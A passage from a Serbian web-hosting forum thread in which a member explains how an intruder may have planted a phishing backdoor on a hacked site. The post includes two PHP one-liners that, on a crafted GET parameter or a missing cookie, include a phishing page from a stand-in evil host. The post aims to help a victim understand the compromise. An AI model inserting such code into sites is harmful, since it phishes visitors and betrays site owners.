|
Web Hosting, web serveri i operativni sistemi Komercijalni hosting, web serveri, bezbednost, operativni sistemi na serverima |
|
Alati teme | Način prikaza |
18. 03. 2010. | #9 | |
novi član
Na probnom radu
Datum učlanjenja: 23.07.2009
Lokacija: U qtji; chuj gde...
Poruke: 23
Hvala: 4
5 "Hvala" u 3 poruka
|
Citat:
Verovatno je stavio neku banalnu stvar tipa: Kôd:
if(isset($_GET['phishing'])) die(include('http://zlisajt.tld/phishing.html')); //sa time što bi "phishing" (iz GET) zamenio nečim privlačnijim pa bi phishing link izgledao tipa: http://tvojsajt.tld/?redir=http://www.ibej.tld/UserAccount/login.se Ili, ako ta web aplikacija ostavlja cookies pri poseti ili logovanju (mada je to manje pouzdano), može da proverava da li cookies (ili šta god da može da iskoristi u ovu svrhu) postoji i tako razlikuje validne posetioce od onih koje navlači na phishing. (Podrazumevam da tvoji posetioci nisu meta.) Kôd:
if(!isset($_COOKIE['poslednja_poseta'])) die(include('http://zlisajt.tld/phishing.html')); Elem, osim ako passwordi nisu bili problem, možda ono što napisah sa gledanjem skoro menjanih fajlova ipak možeš da iskoristiš uskoro |
|
|
|
Slične teme | ||||
Tema | Početna poruka teme | Forum | Odgovori | Poslednja poruka |
httpool - iskustva | Milan G. | Marketing i SEO | 38 | 23. 10. 2010. 20:59 |
citanje shell output-a tokom izvrsavanja komande | ivanhoe | PHP | 3 | 07. 07. 2010. 01:07 |
Iskustva sa Silverstripe CMS | SiniX | Web aplikacije, web servisi i software | 2 | 27. 01. 2010. 23:49 |